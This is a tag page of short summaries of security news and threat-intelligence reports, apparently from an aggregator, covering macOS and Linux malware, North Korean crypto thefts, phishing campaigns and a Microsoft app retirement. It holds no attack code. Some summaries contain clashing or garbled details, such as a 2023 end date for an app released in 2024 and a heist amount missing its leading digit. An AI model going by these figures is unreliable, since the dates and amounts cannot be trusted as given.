Tag: MACOS

Microsoft replacing Remote Desktop app with Windows App in May
Summary: Microsoft will discontinue support for the Remote Desktop app from the Microsoft Store on May 27, 2023, and recommends users transition to its new Windows App, which has been available since September 2024. Users are advised to utilize the built-in Remote Desktop Connection app for connecting to Remote Desktop Services until support is integrated into the new app.…
Read More
Fortinet Identifies Malicious Packages in the Wild: Insights and Trends from November 2024 Onward
FortiGuard Labs has tracked various malicious software packages since November 2024, highlighting a range of techniques used by attackers to exploit system vulnerabilities. The analysis reveals tactics such as low-file-count packages, suspicious install scripts, and command-and-control communication methods, showcasing the malicious intent concealed within software installations.…
Read More
RST TI Report Digest: 10 Mar 2025
This week’s threat intelligence report reveals a range of sophisticated cyber threats, including targeted multistage malware attacks, ransomware groups adopting new backconnect malware, and social engineering tactics employed in recruitment scams. Notable threats included a campaign targeting aviation and transport in the UAE, while other malware leveraged social media for distribution.…
Read More
Safe{Wallet} Confirms North Korean TraderTraitor Hackers Stole .5 Billion in Bybit Heist
Summary: Safe{Wallet} disclosed details about a sophisticated cyberattack on Bybit, attributed to state-sponsored North Korean hackers. The attackers employed advanced social engineering techniques to compromise a developer’s machine and hijack AWS session tokens, enabling them to conduct covert operations. The incident highlights serious security vulnerabilities in the cryptocurrency industry, which faces record losses from hacks in 2025.…
Read More
Unmasking the new persistent attacks on Japan
Cisco Talos discovered a malicious campaign attributed to an unknown attacker targeting organizations in Japan since January 2025, primarily exploiting the CVE-2024-4577 vulnerability to gain initial access and deploy advanced adversarial tools via Cobalt Strike. The attacker’s activities entail credential theft, system compromise, and potential lateral movement which could impact various industries.…
Read More
Typosquatted Go Packages Deliver Malware Loader Targeting Li…
A recent analysis reveals a sustained malicious campaign targeting the Go ecosystem, utilizing typosquatted packages to distribute loader malware to Linux and macOS systems. At least seven packages were identified as impersonating popular Go libraries, with a significant focus on deception aimed at financial-sector developers. The malware employs obfuscation techniques and has been linked to multiple malicious domains while remaining accessible on Go Module Mirror.…
Read More
Defending against USB drive attacks with Wazuh
Summary: USB drive attacks represent a critical cybersecurity threat, utilizing everyday USB devices to spread malware and compromise network defenses, shown by incidents like the Stuxnet worm. These threats can lead to data breaches, financial losses, and damaged reputations for organizations. Solutions like Wazuh provide essential monitoring capabilities to detect and respond to such attacks across various operating systems.…
Read More
Analysis of the Relationship Between Emergency Martial Law Themed APT Attacks and the Kimsuky Group
This article analyzes APT attacks leveraging political and social issues in South Korea, with a focus on a spear phishing campaign distributing malicious files via email. The attack targets users in the North Korean sector using social engineering tactics to avoid antivirus detection. It emphasizes the urgent need for Endpoint Detection and Response (EDR) systems to identify and mitigate these threats effectively.…
Read More
RST TI Report Digest: 03 Mar 2025
This week’s threat intelligence report from RST Cloud analyzes various cybersecurity threats targeting different sectors and establishments. Noteworthy attacks include FatalRAT impacting industrial organizations in the Asia-Pacific region, with an advanced delivery mechanism utilizing DLL sideloading. The Silent Killers report discusses a large-scale exploitation of legacy drivers, while other reports cover threats like Koi Stealer, AMOS Stealer, and attackers affiliated with the Hellcat and Silver Fox groups targeting governmental and healthcare sectors, respectively.…
Read More
Turkey’s Attacking APT Groups and Attack Analyses
This study offers a comprehensive examination of Advanced Persistent Threats (APTs), focusing on their dynamics, techniques employed, and preventive measures. The article discusses the identification of APTs, the reasons behind attacks on Turkey, and their geopolitical and economic impacts. Furthermore, it explains the concept of Tactics, Techniques, and Procedures (TTP), their subdivision into sub-techniques, and details effective strategies to mitigate APT attacks.…
Read More
5,000 Phishing PDFs on 260 Domains Distribute Lumma Stealer via Fake CAPTCHAs
Summary: A widespread phishing campaign utilizing fake CAPTCHA images in PDF documents hosted on Webflow’s CDN has been uncovered, aimed at distributing Lumma Stealer malware. The campaign has affected over 1,150 organizations and more than 7,000 users, predominantly in North America, Asia, and Southern Europe. Attackers employ SEO tactics to lure victims and have been observed uploading malicious PDFs to legitimate online libraries, further amplifying the threat.…
Read More
Poseidon Mac Malware Hiding Within PKG Files to Evade Detections
Summary: Cybersecurity researchers have identified the Poseidon malware, a macOS-targeting trojan that utilizes PKG files and preinstall scripts to infiltrate systems. At just 207 bytes, this malware poses a severe threat to Mac users, evading detection and stealing sensitive data. Its sophisticated techniques include anti-debugging measures and the evasion of macOS security features, making it one of the most active macOS infostealers.…
Read More
Summary: A recent report from Unit 42 reveals a new campaign of cyberattacks linked to North Korea, targeting macOS users, particularly in the cryptocurrency sector. The malware RustDoor and Koi Stealer are designed to exfiltrate sensitive data while evading detection through macOS-specific techniques, often luring victims with fake job offers.…
Read More
Securonix Threat Labs Monthly Intelligence Insights – January 2025
The Monthly Intelligence Insights report for November 2024 by Securonix Threat Labs highlights critical cybersecurity threats, incidents, and responses, including notable breaches involving Cyberhaven and the exploitation of Ivanti vulnerabilities. Organizations are urged to enhance their security measures, such as updating software and implementing more vigilant monitoring systems.…
Read More
RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector
This article discusses the rise of macOS-targeting malware, particularly from North Korean APT groups, focusing on two notable malware samples: RustDoor and Koi Stealer. RustDoor disguises itself as a legitimate software update, while Koi Stealer, which is previously undocumented, primarily aims to steal sensitive data, including cryptocurrency wallet information.…
Read More
New ‘Auto-Color’ Linux Malware Targets North America, Asia
Summary: Palo Alto Networks has reported on a new Linux malware named Auto-Color, which provides threat actors with backdoor access to compromised devices. This malware has primarily targeted universities and government entities in North America and Asia, requiring explicit execution by the victim for activation. Auto-Color employs advanced evasion techniques, making it challenging to detect and remove without specialized software.…
Read More